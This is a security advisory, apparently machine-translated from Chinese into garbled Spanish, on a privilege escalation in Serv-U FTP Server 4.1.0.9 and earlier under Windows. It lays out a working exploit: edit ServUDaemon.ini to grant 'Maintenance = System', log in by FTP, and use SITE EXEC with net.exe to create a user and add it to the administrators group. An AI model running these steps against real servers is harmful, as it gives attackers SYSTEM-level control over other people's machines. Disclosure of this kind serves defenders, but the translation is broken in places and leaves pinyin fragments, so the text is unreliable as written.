Local privilegios elevados: Sí
Remoto privilegios elevados: Sí
Utilice condiciones previas: perfil Serv-U en una modificada permisos
Descargo de responsabilidad: Esta es sólo una escalada de privilegios ideas y métodos.
1, el software afectado
Serv-U FTP Server 4.1.0.9 (y todas las versiones anteriores)
En segundo lugar, el sistema afectado
Todas las versiones de Microsoft Windows Server 2003
Todas las versiones de Microsoft Windows XP
Todas las versiones de Microsoft Windows 2000
Todas las versiones de Microsoft Windows NT
En tercer lugar, la revisión
Serv-U FTP Server para RhinoSoft producido un software de FTP Sserver, que son utilizados en todo el mundo. Después de encontrar, Serv-U FTP configuración del servidor de archivos almacenados en el Serv-U FTP de archivos del servidor de directorio de archivos ServUDaemon.ini. Si el local o remoto para tener una ordinaria privilegios de usuario limitadas a un usuario malintencionado puede acceder a los archivos y documentos cuidadosamente Gouzao ServUDaemon.ini la Neirongjiuneng Li Yong Jin Zhong Ftp sistemas Chengzai aplicar Mezclados arbitrario con privilegios de SYSTEM.
4, defecto análisis:
Serv-U FTP Serve establecer la información de configuración de usuario se almacena y luego tramitar ServUDaemon.ini. Incluidos los derechos del usuario a la información y para acceder a la información del directorio. usuario local o limitada a un atacante remoto para leer y escribir, siempre y cuando Serv-U FTP Sirva el directorio de archivos, puede modificar los archivos en el proceso de directorio ftp ServUDaemon.ini de realización del control remoto, el administrador del sistema local de FTP ejecutar comandos arbitrarios. Sistema de versión y que no están sujetos al impacto. (Información del Usuario Seleccione la "memoria y el registro del sistema" sin este defecto afectados)
5, el método de ensayo:
1, la prueba local
Supongamos que un usuario local limitada puede navegar por el Serv-U FTP Sirva el directorio de archivos. Buscar ServUDaemon.ini archivo. Utilice el Bloc de notas para abrir el contenido general del documento original:
[Global]
Version = 4.1.0.0 / / Serv-U Ftp Server número de versión
ProcessID = 584
RegistratinKey = + UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB
[DOMINIOS]
Dominio1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 archivo / / host IP y el nombre de dominio, las condiciones del puerto
[Dominio1]
Usuario1 = zihuan | 1 | 0
[USUARIO | zihuan = 1]
Contraseña = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir = c: / / puede navegar por el directorio
TimeOut = 600
Access1 = C: RWAMLCDP |
Si ServUDaemon.in archivo modificado como sigue:
[Global]
Version = 4.1.0.0
ProcessID = 584
RegistratinKey = + UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB
[DOMINIOS]
Dominio1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Dominio1]
Usuario1 = zihuan | 1 | 0
[USUARIO | zihuan = 1]
Contraseña = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir = c:
TimeOut = 600
Mantenimiento = Sistema de archivos / / Permisos de tipo
Access1 = C: RWAMELCDP |
Lo anterior, más que el contenido original de un "Sistema de Mantenimiento =" guardar después de la edición. A continuación, utilice el inicio de sesión ftp para Serv-U FTP Server después de la ejecución del siguiente comando:
Ftp IP abierta
Conectado a la propiedad intelectual.
220 Serv-U FTP Server v4.1.0.0 para WinSock listo ...
Usuario (Dirección IP: (ninguno)): archivo id / / usuario estructura de insumos
331 Nombre de usuario de acuerdo, por favor envíe la dirección completa de correo electrónico como contraseña.
Contraseña: archivo de contraseñas / / contraseña
230 Usuario conectado, proceda.
Ftp cd winnt archivo / / en el directorio winnt win2k, si es Windows XP o Windows Server 2003 debe ser el directorio de Windows.
250 Directorio cambiado a / WINNT
Ftp cd system32 archivo / / en el directorio system32
250 Directorio cambiado a / WINNT/system32
Ftp citar el sitio del usuario ejecutivo Net.exe ziHUAN zihuan / añadir el archivo / / utilizar los archivos de sistema, más Net.exe el usuario.
200 comandos EXEC éxito (TID = 33).
Ftp cotización sitio localhost ejecutivo Net.exe administradores zihuan / añadir el archivo / / actualizar a super-usuario
Este aumento en el sistema local, una contraseña para el zihuan: ziHUAN super usuario. También se puede citar directamente sitio localhost ejecutivo Net.exe administradores usuario / add para el usuario actual para actualizar a la super grupo de usuarios que ir. Por supuesto, usted puede ejecutar cualquier comando en el sistema.
Declaración:
Libros sólo para describir los problemas de seguridad posible, el autor y la revista Archivos X hackers este boletín de seguridad no es proporcionar ninguna garantía o promesa. A medida que la expansión del uso de la información proporcionada en este artículo, a raíz de las consecuencias directas o indirectas de la pérdida por el propio usuario es responsable, el autor no asume ninguna responsabilidad en ello. Los autores han revisado este boletín de seguridad y la interpretación. Para este artículo, reproducido o transmitido, para garantizar la integridad de este artículo, incluyendo el aviso de copyright y cualquier otro contenido. Autorizada sin que el autor no podrá modificar o cambiar cualquiera de los contenidos de este anuncio artículo.